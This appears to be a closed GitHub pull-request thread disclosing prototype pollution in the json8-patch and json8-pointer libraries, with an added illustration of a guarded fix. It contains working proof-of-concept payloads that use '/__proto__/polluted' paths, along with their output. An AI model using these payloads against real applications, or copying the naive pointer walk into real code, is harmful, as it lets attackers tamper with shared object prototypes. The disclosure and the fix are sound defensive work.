Closed luci-m-666 closed 3 years ago
json8-patch and json8-pointer are vulnerable to prototype pollution.

POC

json8-patch

```js
var json8Patch = require("json8-patch")
var obj = {}
const patch = [{op: "add", path: "/__proto__/polluted", value: "Yes! Its Polluted"}];
console.log("Before : " + obj.polluted);
json8Patch.apply(obj, patch);
console.log("After : " + {}.polluted);
```

json8-pointer

```js
var json8Pointer = require("json8-pointer")
json8Pointer.unflatten({"": {}, "/firstName": "John", "/__proto__/polluted": "Yes! Its Polluted"});
console.log({}.polluted)
```

OUTPUT

```
Before : undefined
After : Yes! Its Polluted
```
With this fix prototype pollution can be avoided.
Thank you.
Made some changes and added tests.
released and published as 1.0.4
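The thread does not show the fix itself, so the following is an added example, not code from json8 or from this pull request. It runs the PoC pointer through a naive JSON Pointer walk and through a guarded one; every function name here is hypothetical, and rejecting `__proto__`, `constructor` and `prototype` tokens is one common mitigation assumed for illustration.

```javascript
// Added illustration, not json8 code. All names are hypothetical.
const FORBIDDEN = new Set(["__proto__", "constructor", "prototype"]);

// Split an RFC 6901 pointer into reference tokens ("~1" -> "/", "~0" -> "~").
function decodePointer(pointer) {
  if (pointer[0] !== "/") throw new Error("invalid JSON Pointer: " + pointer);
  return pointer.slice(1).split("/").map((t) => t.replace(/~1/g, "/").replace(/~0/g, "~"));
}

// Naive walk: each token is used as a property key, so "__proto__" resolves
// to Object.prototype and the final assignment lands on it.
function addNaive(doc, pointer, value) {
  const tokens = decodePointer(pointer);
  const last = tokens.pop();
  let target = doc;
  for (const t of tokens) target = target[t];
  target[last] = value;
  return doc;
}

// Guarded walk: reject dangerous tokens, descend through own properties only.
function addGuarded(doc, pointer, value) {
  const tokens = decodePointer(pointer);
  for (const t of tokens) {
    if (FORBIDDEN.has(t)) throw new Error("forbidden token in pointer: " + t);
  }
  const last = tokens.pop();
  let target = doc;
  for (const t of tokens) {
    if (!Object.prototype.hasOwnProperty.call(target, t)) throw new Error("path not found: " + t);
    target = target[t];
  }
  target[last] = value;
  return doc;
}

// Constructed demo: same pointer as the PoC, through both walks, with cleanup.
function demo() {
  const result = {};
  addNaive({}, "/__proto__/polluted", "Yes! Its Polluted");
  result.naive = {}.polluted;           // visible on an unrelated object
  delete Object.prototype.polluted;     // undo the pollution before continuing
  try {
    addGuarded({}, "/__proto__/polluted", "Yes! Its Polluted");
    result.guarded = "accepted";
  } catch (e) {
    result.guarded = e.message;
  }
  result.afterGuarded = {}.polluted;
  return result;
}
```

The token denylist also refuses documents that legitimately use a key named `constructor` or `prototype`; building intermediate containers with `Object.create(null)` is an alternative that avoids that trade-off.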